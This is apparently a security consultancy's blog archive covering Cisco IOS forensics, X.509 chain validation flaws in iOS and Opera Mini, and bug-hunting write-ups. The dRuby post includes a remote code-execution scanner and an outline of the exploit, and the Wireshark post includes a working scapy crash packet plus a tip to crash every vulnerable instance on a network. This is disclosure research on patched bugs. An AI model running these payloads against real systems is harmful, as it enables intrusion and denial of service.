Wed Feb 1 20:07:04 CET 2012

Cisco Incident Response (CIR) 1.1 Open Source Release

Recurity Labs created a system for the inspection of Cisco legacy IOS memory dumps back in 2008. The tool, called Cisco Incident Response, was meant to identify successful and unsuccessful exploits of binary nature against Cisco routers running IOS 11.x and 12.x. IOS 15.x is now available, but doesn't differ much from the previous releases in terms of internal design.

We ran an online service for uploading and analyzing IOS images together with core dumps generated from them. This service has been used by various people, but not a single core dump contained indications of an actual binary exploit against the platform. It seems that it's simply too easy to pwn a company by traditional means of browser, Flash, Java, EXE file in email, social engineering or cloud service.

To support nostalgic hobbyists concerning themselves with the same questions half a decade later, we decided to publish the source code of CIR today, in order to allow anyone to use it and inspect its inner workings. We believe that Kerckhoff's Principle also holds true for defense and detection systems. Therefore it is educating to look at code bases that have been tested in production for quite some time.

The code is interesting besides the embedded knowledge about Cisco IOS data structures. Here are a couple of points for the inclined reader:

  • 23k lines of code, completely managed .NET (C#)
  • Plug-in based knowledge system, where every plug-in consumes and provides some type of abstracted information about the subject, formulated by .NET types
  • Several lists with differing offsets between IOS minor versions and service releases, for those assuming that IOS data structures will always look the same between e.g. 12.4.3 and 12.4.3J.
  • An ELF file format parser that could be useful in other projects
  • Report generation and daemon mode, to allow CIR to be used in corporate and provider networks automatically.
The code is released under GPLv3, and can be found at http://cir.recurity.com. We also provide a binary distribution for those who simply want to use it.


Posted by FX | Permanent link

Tue Aug 9 18:34:11 CEST 2011

CVE-2011-0228 and the Opera Mini UI-Design

Recurity Labs received user reports, followed by our own tests, that Opera Mini is affected by the CVE-2011-0228 X.509 certificate validation issue, orginially reported for Apple iOS.

Upon filing a bug with Opera Software (ID SKIRNE-136848), we tried to contact them directly. With some external help, we managed to get in contact with security people at Opera and received the following interesting statement:

Thanks for reporting an issue with Opera.

While you are correct that Opera Mini does not display a certificate
warning about chains with unknown Root certificates, there is, however,
a significant difference between what happened in iOS and what happens
in Opera Mini. Opera Mini will not indicate that such pages are secure,
that is, no padlock or similar indication is displayed for the web site
affected by this, giving the same security indications as it would for
an unencrypted site, which is the same as would have been displayed if
the user manually accepted the certificate.

Not showing a dialog was a design decision by the Opera Mini team, due
to the transcoder architecture of Opera Mini, and in part the
complexity of having the transcoder (proxy) server display a dialog at
the device and the obtain the result before continuing.

For more about Opera Mini security see
http://www.opera.com/mobile/help/faq/#security.

Reviewing the provided FAQ URL, we can learn that Opera Mini will show a padlock (at the top right corner) if the connection to the web site was secured. No padlock is shown for unsecured sites using HTTP.
When testing Opera Mini with https://iSSL.recurity.com, no padlock is shown. However, the URL in the address bar still says https:// with no indication that anything might be wrong with that. Judging from the user feedback we received, it is not clear to the users that the absense of the padlock means that the certificate validation failed.
In our emulation environment, we also discovered that on small screen devices, the padlock might not even be on-screen when loading a site.

Opera could easily display the failed certificate verification using other means than dialog boxes, e.g. through a red background in the address bar, similar to Internet Explorer.
Given the current approach, we recommend to not use Opera Mini for anything requiring a secure connection to a web site, especially considering that Opera Mini does not provide end-to-end encryption in any case.


Posted by FX | Permanent link

Tue Jul 26 22:25:23 CEST 2011

CVE-2011-0228 iOS certificate chain validation issue in handling of X.509 certificates

Recurity Labs recently conducted a project for the German Federal Office for Information Security (BSI), which (amongst others) also concerned the iOS platform. During the analysis, a severe vulnerability in the iOS X.509 implementation was identified. When validating certificate chains, iOS fails to properly check the X.509v3 extensions of the certificates in the chain. In particular, the "Basic Constraints" section of the supplied certificates are not verified by iOS. In the Basic Constraints section, the issuer of a certificate can encode whether or not the issued certificate is a CA certificate, i.e. whether or not it may be used to sign other certificates. Not checking the CA bit of a certificate basically means that every end-entity certificate can be used to sign further certificates. To provide an example: When a CA issues a certificate to a Web site, the CA will usually set the CA bit of this certificate to false. Assume, the attacker has such a certificate, issued by a trusted CA to attacker.com. The attacker can now use their private key to sign another certificate, which may contain arbitraty data. This could for instance be a certificate for bank.com or even worse, it could be a certificate containing multiple common names: *.*, *.*.*, ... iOS fails to check whether the attacker's certificate was actually allowed to sign subsequent certificates and considers the so created univeral certificate as valid. The attacker could now use this certificate to intercept all SSL/TLS traffic originating from an iOS device. However, SSL/TLS is not the only use of X.509. Every application that makes use of the iOS crypto framework to validate chains of X.509 certificates is vulnerable.

The idea that Apple could have made a 8 year old mistake was suggested by Bernhard 'bruhns' Brehm.

To test whether your iOS version is vulnerable, Recurity Labs has set up a Web site: https://iSSL.recurity.com. If the Safari browser on your iDevice allows you to visit this site without issuing a warning, your device is vulnerable. The certificate for this site was created using the above described technique. Please feel free to validate this by inspecting the certificate that the HTTP server supplies to you.


Posted by Greg | Permanent link

Thu May 12 18:06:51 CEST 2011

dRuby for Penetration Testers

I like Ruby somehow, a nice and shiny programming language. At some point last year, I decided to have a closer look at 'Distributed Ruby' (also called dRuby). dRuby is all about easily usable objects and method invocations over the network.

So no long words: let's just drop into some simple dRuby server code:

01  require 'drb/drb'
02  URI="druby://localhost:8787"
03  class TimeServer
04    def get_current_time
05      return Time.now
06    end
07  end
08  FRONT_OBJECT=TimeServer.new
09  $SAFE = 1 # disable eval() and friends
10  DRb.start_service(URI, FRONT_OBJECT)
11  DRb.thread.join

Lines 03 to 07 define a class TimerServer with the method get_current_time. All the magic happens in line 10 where the dRuby service is started along with the TimeServer class as exposed Object. You'll probably have noticed line 09 where it says $SAFE = 1. This nifty variable turns on tainting and should disallow you from calling arbitrary code on the server side (that's basically what the documentation says). No worries, we'll come back later to circumventing $SAFE.

But first, let's look at the client side. Using this service would be as simple as:

01 require 'drb/drb'
02 SERVER_URI="druby://localhost:8787"
03 DRb.start_service
04 timeserver = DRbObject.new_with_uri(SERVER_URI)
05 puts timeserver.get_current_time

So here after starting the dRuby service in line 03, and getting a remote object in line 04, we can simply call methods of that object over the wire. This is done in line 05. That's all what's needed for a dRuby client.

Now let's start building a more useful client. Namely a scanner for $SAFE being set.

01 #!/usr/bin/ruby
02 require 'drb/drb'
03
04 # The URI to connect to
05 SERVER_URI= ARGV[0]
06
07 DRb.start_service
08 undef :instance_eval
09 t = DRbObject.new_with_uri(SERVER_URI)
10 
11 begin
12 a = t.instance_eval("`id`")
13 puts "[*] eval is enabled - you are:"
14 puts a
15 rescue  SecurityError => e
16 puts "[*] sorry, eval is disabled"
17 rescue  => e
18 puts "[*] likely not a druby port"
19 end

This scanner cheks remotely if the developer forgot to set $SAFE. It will tell you the ID of the user running the dRuby service. Of course you are free to alter this in order to do more fun stuff with the server, or you could just use the respective Metasploit module.

But now back from shiny Ruby world to some Bughunting. So: what could possibly go wrong when pushing serialized objects back and forth on the wire?

My first attempts of poking around in dRuby with $SAFE set were as follows:

01 require 'drb/drb'
02 SERVER_URI="druby://localhost:8787"
03 DRb.start_service
04 t = DRbObject.new_with_uri(SERVER_URI)
05 t.eval("`id`")

Here in line 05 I tried to call eval on the remote object. Unfortunately this resulted in the following error:

NoMethodError: private method `eval' called for #<TimeServer:0xb7821a88>:TimeServer

During playing around further with dRuby, and looking further into the source, I found the following piece of code in drb/drb.rb:

    # List of insecure methods.
    #
    # These methods are not callable via dRuby.
    INSECURE_METHOD = [
      :__send__
    ]

Here, __send__ gets blacklisted from being called via dRuby. However, and unfortunately, there's also an existing send method, as described in the Ruby documentation:

obj.send(symbol [, args...]) -> obj
obj.__send__(symbol [, args...]) -> obj

Invokes the method identified by symbol, passing it any arguments specified. 
You can use __send__ if the name send clashes with an existing method in obj. 

This very send method should give us the ability to call private methods on the object as follows:

t.send(:eval, "`id`")

This somehow worked but we run into another error:

SecurityError: Insecure operation - eval

I tried various functions taken from the class Object and the Kernel module; but all interesting functions were caught by a SecurityError. Wait a minute, really all of them? No, one little function was still willing to execute - and that function is syscall. So basically, we get free remote syscalls on the server side. When I reported this to the dRuby author, turns out, tainting (which causes the SecurityError) was forgotten for syscalls.

In order to exploit this issue properly, we need a rather simple combination of syscalls to gain arbitrary command execution:

  • open() or creat() a file with permissions 777
  • write() some Ruby code to it
  • close() the file
  • fork() so that the dRuby service keeps running
  • execve() the just created file
This nice combo of syscalls is implemented in the Metasploit module as well. Alors! go out and play with it :)

If you take a closer look at the Metasploit module, you'll see a neat little trick i came up with: At first, when connecting, it's not possible to decide whether we are on a 32 Bit or 64 Bit target system. Additionally the syscall numbers are different for those two versions of Linux. So i choose syscall 20, which is getpid() on 32bit systems, on 64bit systems it's syscall writev(). So when we call this syscall with no arguments, it should succeed on 32bit systems. On 64bit systems, it will raise an error due to missing arguments. We can then catch this error and use our 64bit syscall numbers.

Thanks at this point go out to two Metasploit guys: bannedit who poked me to put together an all-in-one exploit, and egypt who improved the instance_eval payload.

Last but not least, a short disclaimer: Both aforementioned modules might not work as exepected on different Ruby versions, as some of these have been patched (by turning on tainting), and some won't have syscall implemented at all. The modules have been tested and found to work with the exploit with the following versions or Ruby: Ruby 1.8.7 patchlevel 249; Ruby 1.9.0; Ruby 1.9.1 patchlevel 378 (all running on Linux 32 Bit systems). Tested as well and found vulnerable has been the 64 Bit version on Ubuntu 10.10 with both ruby1.8 and ruby1.9 packages.


Posted by Joern | Permanent link

Wed Mar 9 18:34:04 CET 2011

At least, I got DoS

On January 11th, a new version of Wireshark has been released. The release contained several security-relevant fixes. Inspired by this fact, on a rainy evening I decided to have a closer look. 'There must be a bit more of that', I thought.

So I fired up my browser and helped myself to the latest Wireshark sorce code (which was version 1.4.3 at that point of time). After unpacking it, I went straight to the dissectors, which reside in the souce directory under epan/dissectors (that I knew from reading the advisories for the bugs fixed in 1.4.3).

Due to Wireshark having more than 1,000 different packet dissectors in this directory, I chose a pretty dumb approach to find interesting code parts:

/wireshark-1.4.3/epan/dissectors$ grep -Hrn memcpy packet-* | less
- a command that yields 553 results. So I scrolled through that list for a bit and finally decided to take a closer look at packet-ldap.c, containing the following tvb_memcpy call:
packet-ldap.c:4020:    tvb_memcpy(tvb, str, offset, len);
The corresponding function is:
int dissect_mscldap_string(tvbuff_t *tvb, int offset, char *str, int maxlen, gboolean prepend_dot)

- which can be found in line 3974 of packet-ldap.c.

The reason why I greped for memcpy was that I hoped to find some code where memcpy is used in a way which introduces a Buffer Overflow.

I quickly checked the tvb_memcpy function for what it does. It is defined in /epan/tvbuff.c and as I suspected, it's a wrapper around good old memcpy which copies from the packet buffer at offset exactly len bytes to str.

But now let's have a look at the function body:

01 int dissect_mscldap_string(tvbuff_t *tvb, int offset, char *str, int maxlen, gboolean prepend_dot)
02 {
03  guint8 len;

04  len=tvb_get_guint8(tvb, offset);
05  offset+=1;
06  *str=0;
07  attributedesc_string=NULL;

08  while(len){
09    /* add potential field separation dot */
10    if(prepend_dot){
11      if(!maxlen){
12        *str=0;
13        return offset;
14      }
15      maxlen--;
16      *str++='.';
17      *str=0;
18    }

19    if(len==0xc0){
20      int new_offset;
21      /* ops its a mscldap compressed string */

22      new_offset=tvb_get_guint8(tvb, offset);
23      if (new_offset == offset - 1)
24        THROW(ReportedBoundsError);
25      offset+=1;

26      dissect_mscldap_string(tvb, new_offset, str, maxlen, FALSE);

27      return offset;
28    }

29    prepend_dot=TRUE;

30    if(maxlen<=len){
31      if(maxlen>3){
32        *str++='.';
33        *str++='.';
34        *str++='.';
35      }
36      *str=0;
37      return offset; /* will mess up offset in caller, is unlikely */
38    }
39    tvb_memcpy(tvb, str, offset, len);
40    str+=len;
41    *str=0;
42    maxlen-=len;
43    offset+=len;

44    len=tvb_get_guint8(tvb, offset);
45    offset+=1;
46  }
47  *str=0;
48  return offset;
49 }

The part I grep'ed for can be found on line 39, where tvb_memcpy copies from the tvb buffer into str. The tvb buffer is the buffer holding the packet data that came across the wire. At this point, my question was:

Can we overflow str in this function?

Unfortunately, turns out we can't. First I checked all calls to this function, and all calls came with a 256 byte long char buffer and a maxlen set to 255. The part of the packet at offset is a length field followed by a string of that length. The length len, which is read as an 8-Bit-value form the tvb buffer in line 04 cannot be greater than 255. And a proper check for maxlen (sized sufficiently) is performed in line 30.

Now you may ask, 'WhyTF does he bore me with non-exploitable code?!' Well, as the title already suggests - at least, I got DoS.

On line 19, a special case is handled, namely compressed strings. This means by a length of 0xc0, it is denoted that the following string is not a string of length 0xc0, but rather an offset into the packet referencing another string. This concept was familiar to me, it's used in DNS as well. Not so suprisingly there were issues within DNS handling code regarding those compressed strings.

Such compressed strings look like this, for instance: We have string1, describing 'recurity.com', at offset 0x23; plus we have another string2, which is 'foo.recurity.com', at another offset. This string2 can be compressed to '\x03foo\xc0\x23' - so now we'd have a string2 containing the length of 'foo' (\x03), and a reference to the offset which contains '\x08recurity\x03com'.

Let's read that part again:

19    if(len==0xc0){
20      int new_offset;
21      /* ops its a mscldap compressed string */

22      new_offset=tvb_get_guint8(tvb, offset);
23      if (new_offset == offset - 1)
24        THROW(ReportedBoundsError);
25      offset+=1;

26      dissect_mscldap_string(tvb, new_offset, str, maxlen, FALSE);

27      return offset;
28    }

As you can see, in line 26 there's a recursive call to dissect_mscldap_string. And in line 23, the offset is checked for not pointing to itself, because this would cause an infinite recursion. But, wait a minute - what if...

   +--------+   +--------+
   | label1 |   | label2 |
   +--------+   +--------+
     \__^_________^ /
         \_________/

...there was a label1 pointing to a label2, with that label2 pointing to label1 again?!

With this wee little trick we'd pass the self-reference check, but also gain infinite recursion, as both strings reference each other.

I decided I definetly wanted a PoC for this bug. Even if it's 'just a DoS', it might be entertaining enough to crash other folks' Wireshark ;) Developing a PoC was pretty straight forward. Again I chose kind of a lazy approach: Since the code handles Connectionless LDAP (hence CLDAP), I searched on the Internet for a bit and found this fancy site, where I grabbed the file 'samba4-join-rtl8139.pcap' containing some CLDAP packets. Wireshark happily dissected the CLDAP packets, especially the netlogon response:

The highlighted part contains a string reference to the very first string labeled 'Forest' with offset 0x18. So I dumped the whole UDP payload of that packet and pasted it into scapy. After this, I replaced the 'Forest' string with a reference to offset 0x1A and a reference back to 0x18 directly afterwards. In scapy, it'd look like this:

send(IP()/UDP(dport='ldap',sport=1025)/("\x30\x81\xa2\x02\x01\x01\x64\x81\x9c\x04\x00\x30\x81\x97\x30\x81\x94\x04\x08\x6e\x65\x74
\x6c\x6f\x67\x6f\x6e\x31\x81\x87\x04\x81\x84\x17\x00\x00\x00\xfd\x03\x00\x00\xda\xae\x52\xd0\x2f\xb4\xa9\x48\x8b\x16\x4e\xbc\x51
\xf9\x60\xb4" + "\xc0" + "\x1a"  +  "\xc0" + "\x18" +  "\x0e\x63\x6f\x6e\x74\x61\x63\x74\x2d\x73\x61\x6d\x62\x61\x34\xc0\x18\x0a
\x43\x4f\x4e\x54\x41\x43\x54\x44\x4f\x4d\x00\x10\x5c\x5c\x43\x4f\x4e\x54\x41\x43\x54\x2d\x53\x41\x4d\x42\x41\x34\x00\x00\x00\x00
\xc0\x61\x05\x00\x00\x00\xff\xff\xff\xff\x30\x0c\x02\x01\x01\x65\x07\x0a\x01\x00\x04\x00\x04\x00"))

This did the job just right - Wireshark silently crashed when sniffing on the loopback device.

This issue has been fixed in Wireshark version 1.4.4 which you can get here. Additionally I wrote a ready to use Metasploit Module which is availabe via msfupdate. The usage is quite simple:


msf > use auxiliary/dos/wireshark/cldap 
msf auxiliary(cldap) >show options

Module options (auxiliary/dos/wireshark/cldap):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  389              yes       The destination port
   SHOST                   no        This option can be used to specify a spoofed source address

msf auxiliary(cldap) > set RHOST 192.168.1.255
msf auxiliary(cldap) > run 

Pro-tip: Use the local networks' broadcast address as RHOST to crash all vulnerable Wiresharks running in your network segment :).


Posted by Joern | Permanent link

Thu May 27 14:43:26 CEST 2010

Jail-breaking the Cisco Unified Communication Manager (CUCM)

We have a long and very good relation to the Cisco PSIRT team, reporting vulnerabilities to them and patiently waiting until fixes are provided. But some things, we simply don't consider to be vulnerabilities in the typical sense of the word. This includes artifacts of product behavior that allow you to get the type of the access to the product that you would expect.

The reasoning is that you already have to have a legitimate operating system administrator account on the CUCM, in order to "escalate" your privileges to a remote root shell. That the legitimate operating system administrator account, as provided by the product, isn't actually root, doesn't change the privilege situation one bit. Also, other people have published other guides (e.g. this one) before.

Therefore, we have decided to publish an article on how to gain the access you may want.

Please use this information only on lab systems or virtual installations. It is not recommended to root any actual Cisco appliance and will most likely void your warranty.


Posted by FX | Permanent link

Wed May 26 17:53:44 CEST 2010

Carnival of the Cultures 2010

A great team needs a good environment to work in, and the environment doesn't stop at the office door. The cultural space in which you live also plays an important role and influences how people think and work. Berlin, home to Recurity Labs, luckily provides a rich and multifarious culture, which all of us enjoy a lot. Therefore, we occasionally want to give back to that environment, doing our little part to make it blossom some more.

For this year's Carnival of the Cultures, a multicultural street parade, we had the opportunity to support [multi:mat] and our long time DJ Friends from Dangerous Drums with getting their float onto the parade.



Our motto for this float: Work hard - Party harder!

We would like to thank [multi:mat] and Dangerous Drums for the making this all possible and of course the hundreds of thousands of people that participated in the parade.


Posted by FX | Permanent link | File under: events

Fri Mar 5 12:39:20 CET 2010

Guest Blogger at Microsoft BlueHat Blog

The Microsoft BlueHat team invited me to publish a rant on their BlueHat blog on TechNet. Of course, I had to deliver: Parser Central: Microsoft .NET as a Security Component


Posted by FX | Permanent link | File under: rants

Thu Jan 29 19:15:02 CET 2009

Corporate Responsibility

During a non public security event, I saw a presentation by Olaf Kolkman about the new DNS server named Unbound. When he mentioned that the whole thing is written in C for performance reasons, I returned that we should simply stop developing production software in languages that produce unmanaged code. We got into quite some discussions with the whole audience after that, many people stating that there isn't an alternative and everything else is just to slow. I'm not buying this for many obvious reasons, but that's for another post.

To put our abilities where my mouth is, we ended up performing a short source code audit for the Unbound developers. After all, Unbound is an effort to produce a reliable, validating and DNSSEC ready name server, something we all want to have deployed on a larger scale. Sergio Alvarez, who by the way will be speaking at CanSecWest this year, looked at the code and found it surprisingly not riddled with remote code execution bugs. I was certainly happy about that find, because it meant the next generation DNS server deployments wouldn't look at a future comparable to ISC bind's past.

That impression, however, was largely because Sergio compiled the code with all the ASSERT statements intact. Now, people running heavy duty production DNS servers will most certainly try to make it as fast as possible, instructing the compiler to get rid of “debug” features like ASSERTs. That might not be a good idea. So here is another lesson learned: When building for production, you might want to keep those ASSERTs compiled in, since your server crashing on funny packets is probably better than to share the administrative control of the machine.

Other than that, I hope the Unbound team keeps up the good work, so people have one less excuse to not move to DNSSEC.


Posted by FX | Permanent link | File under: events

Thu Jan 29 16:55:44 CET 2009

What didn't fit into the talk.

Some of you might have heard that I gave a talk on Cisco IOS security at the 25C3 this year. The talk was unique for me in many ways, starting with the fact that it covered content going all the way back to the beginnings of Phenoelit up to material that was developed within Recurity Labs. It could be said that the talk was a nexus of research efforts in different areas of my life.

The second unique aspect was the cheer amount of stuff to cover, which prevented more in-depth reflections on some of the issues. This begins with the question of who would actually take over Cisco routers. The short answer is of course: whoever can. But that needs to be taken apart in more detail. Let's focus on attacks that directly apply to the device in question and ignore for now that the easiest way to take over an entire network infrastructure is to attack the unpatched Sun servers running in the Network Operation Center.

Consider successful exploits a question of development cost. An exploit is in that respect not different than any other software: you find someone you think can actually pull it off, present your requirements and have them develop it for you. In almost all cases, this isn't going to be for free, so they will give you a price tag for the work, which in most cases is a linear function of the cost of a work hour for them. This implies that the better they are, the less hours they will need to develop the exploit for you, which makes it cheaper. This is what made exploits against Windows desktops so cheap that attackers mostly relied on them for gaining access to networks from what the network owners considered inside (an outdated but still widespread way of looking at it).

Our research concerning Cisco IOS security was always based on the assumption that there are entities in this world that have reached a reasonable development cost level for IOS exploits. But the publicly available knowledge on how to write IOS exploits didn't fit the bill, as they required to jump into some memory address that is specific to the IOS image running on the target. Assumed you don't know what image is running on that machine, you could still argue that the exploit writer included a list of all possible image dependent addresses into the exploit would try them out, one at a time. This would cause the router to reboot every time a wrong guess was tried.

In the presentation, I said that there are about 100.000 different IOS images in use. This is a very debatable number, as about 15.000 are supported by Cisco at any given time and good network administrators will only run one or two IOS images in their entire network, often times investing several months to figure out which exact image they want. When we however fire up the Cisco Feature Navigator and ask it for all IOS images that support IP Routing, which should be all of them, we get: “Showing 1-50 of 280715 results” at the bottom of the page. Wow, what a number. On page 5615 of the result listing (thank god they have a direct jump feature!), we see that this covers everything from IOS 12.4 to 11.2. Therefore, the number doesn't take very old networks into account, in which you do see images below 11.2 running occasionally.

It should be clear that trying them all out is not an option, especially considering reboot times of 30 seconds and more per attempt. Your exploit would constantly reboot a router for 2339 hours or 97 days. And that doesn't take into the account that you need to get and disassemble them all, estimated time with IDA: 5848 days or 16 years.

Therefore, there is either no one exploiting IOS devices or they have found a better way to do it. Our Cisco Incident Response tool was developed in the hopes of finding people attacking IOS devices, successful or not. But then again, it's hard to write a detection for the unknown, so we also had to look into finding ways to get code execution stable. The method presented at the 25C3 (and documented here, feel free to post questions in the discussion section) only reduces the number of things you have to know about your target, it doesn't eradicate the problem in general. Now, we only need to know the ROMMON version and there are a lot less ROMMONs than IOS images out there.

For smaller machines, such as 2600s, updating ROMMON did not seem to be supported and the version depends on the shipping date. However, after closer inspection, here comes an errata: Cisco does offer 6 updated ROMMONs for 2600 routers. For larger machines, e.g. 7206s, there are about 36 different versions known. That's a few magnitudes smaller than 280715. But it is also still far from the ultimate truth, as you still need to know and have that ROMMON as well as knowing a few things of the box, most importantly the hardware series. Some people like to include the hardware series in their router's DNS records or name the PTR records of the IP addresses bound to a router's interface after the interface itself, which allows to guess what type of metal it is.

Knowing the hardware platform is actually more important for the first and second stage shellcode than it is for getting stable code execution, as the same ROMMON seems to be applicable to a number of subtypes of routers, while one subtype may have memory wired into different addresses than the other. But being lucky is also a valid option, which is what happened when we selected the memory area for a direct write: I assumed the memory at 0x80000000 on a 2600 is used for global IOS variable pointers, which is incorrect. So, errata #2: I was made aware that this is of course the exception vectors, after the MMU is turned on. Accordingly, this is a very good place to store two instructions.

There is still a lot to do and research when it comes to Cisco IOS and security. But the stable, image independent code execution at least allows us finally to draw better assumptions about the attacks we should be looking for. It shows nicely that, even with CIR, we should not try to detect the exploitation while it happens, but focus on the shellcode functionality and the footprints it leaves. And the IP options vulnerability is a perfect example why critical infrastructure should always dump the core files onto its own FLASH device, as dumping core over FTP doesn't really work to well when your “IP Input” process just got popped.


Posted by FX | Permanent link